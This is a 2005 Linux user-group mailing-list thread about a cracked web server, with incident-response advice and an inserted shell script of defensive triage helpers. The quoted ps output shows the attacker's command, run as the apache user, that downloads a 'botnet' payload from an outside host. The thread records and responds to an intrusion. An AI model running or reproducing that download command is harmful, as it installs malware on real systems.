[vox-tech] lugod.org cracked?

ME dugan at passwall.com
Tue Feb 15 13:08:24 PST 2005


2 tools:
1) Rootkit with local exploits
2) IRC Relay with authentication and bounce... probably a file server for
dcc requests of pr0n, movies, or music.

You will want to down the box and run some integrity checking scripts to
verify the applications installed are from the packages you have
installed.

You will want to find all setUID scripts/apps on the system and check
/etc/password for new accounts.

It would be a good idea to track the time of the event to the files with
the earliest creation stamp. Look for any files owned by the apache user or
group on the system which are not where they should be (most will be in
publicly writable spaces like /tmp, /var/tmp, /usr/tmp, etc.).

Associate the creation time of these files with entries in your web server
logs... you may not be able to find an error with the correct time if a
service/daemon faulted before it could write a log entry.

Is lugod.org running a file integrity checker?

Inspect all php files for modification and trojans that may have been left
behind.

You may have a cache of videos/music/stuff left behind too.

You don't know what other rootkits may have been used. Even init could
have been trojaned. It is also possible for modules to be loaded and
hidden from listing/view.

Check everything. If that is too much work, backup to tape, clean install,
and only move files over that have been sanitized.

HTH,
-ME
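A small set of triage helpers for the checks described above (setuid inventory, stray files owned by the web-server account sorted oldest first, and pulling the web log lines from the minute a file was written). This is an added example, not code from the list post or from lugod.org; it assumes GNU findutils and GNU date, a scan root passed as the first argument, and the web-server account passed by name or uid.

```shell
#!/bin/sh
# Post-compromise triage helpers. Added example; assumes GNU find (-printf) and GNU date (-d).

# setuid/setgid files under the scan root ($1), to diff against the package manifests.
find_setuid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Files owned by the web-server account that sit outside the directories where
# they belong, printed as "<epoch mtime> <path>" with the oldest first so the
# earliest foothold is at the top of the list.
# $1 = scan root, $2 = owner (name or numeric uid), $3... = expected directories.
find_stray_owned() {
    root=$1; owner=$2; shift 2
    find "$root" -xdev -user "$owner" -type f -printf '%T@ %p\n' 2>/dev/null |
    while IFS= read -r line; do
        path=${line#* }
        skip=0
        for d in "$@"; do
            case $path in "$d"/*) skip=1 ;; esac   # inside an expected directory
        done
        if [ "$skip" -eq 0 ]; then printf '%s\n' "$line"; fi
    done | sort -n
}

# Web-server log lines from the same minute as a suspicious file's mtime.
# $1 = access log, $2 = epoch seconds (first field of find_stray_owned output).
# Assumes the common/combined log format stamp "[dd/Mon/yyyy:HH:MM:SS zone]" in local time.
log_lines_at() {
    stamp=$(date -d "@${2%.*}" '+%d/%b/%Y:%H:%M')
    grep -F "[$stamp" "$1"
}
```

Run `find_stray_owned / apache /var/www /var/cache/httpd` on the live box (or on the mounted disk of the downed one) and feed the first field of its first line to `log_lines_at`.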

ME said:
> Most common trojan/exploit is for irc relays.
>
> Guess for entry? Did you upgrade php and apache after those security holes
> were found a while back?
>
> Could you send me a copy of the binary files you have found in
> /tmp/.image? (Thanks.)
>
> -ME
>
> Rod Roark said:
>> I found that something was sucking up all my bandwidth late
>> this morning.  ps -aux showed this:
>>
>> apache    3267  0.0  0.0   2560  1024 ?        S    11:14   0:00 sh -c
>> wget leblocks.sytes.net/botnet | grep abcdeee 2>&1 3>&1
>> apache    3268  0.0  0.1   3060  1460 ?        S    11:14   0:00 wget
>> leblocks.sytes.net/botnet
>> apache    3269  0.0  0.0   1416   448 ?        S    11:14   0:00 grep
>> abcdeee
>>
>> After killing all processes owned by apache and doing a bit
>> of checking around, I found these perl scripts in
>> /tmp/.images:
>>
>> -rw-r--r--   1 apache apache 20281 Feb 15 12:13 botnet
>> -rw-r--r--   1 apache apache  9592 Oct 12 23:23 pv
>> -rw-r--r--   1 apache apache  9592 Oct 12 23:23 pv.1
>>
>> They are definitely malicious.  Does anyone know what this
>> malware is?
>>
>> -- Rod
>> _______________________________________________
>> vox-tech mailing list
>> vox-tech at lists.lugod.org
>> http://lists.lugod.org/mailman/listinfo/vox-tech
>>
>>
>
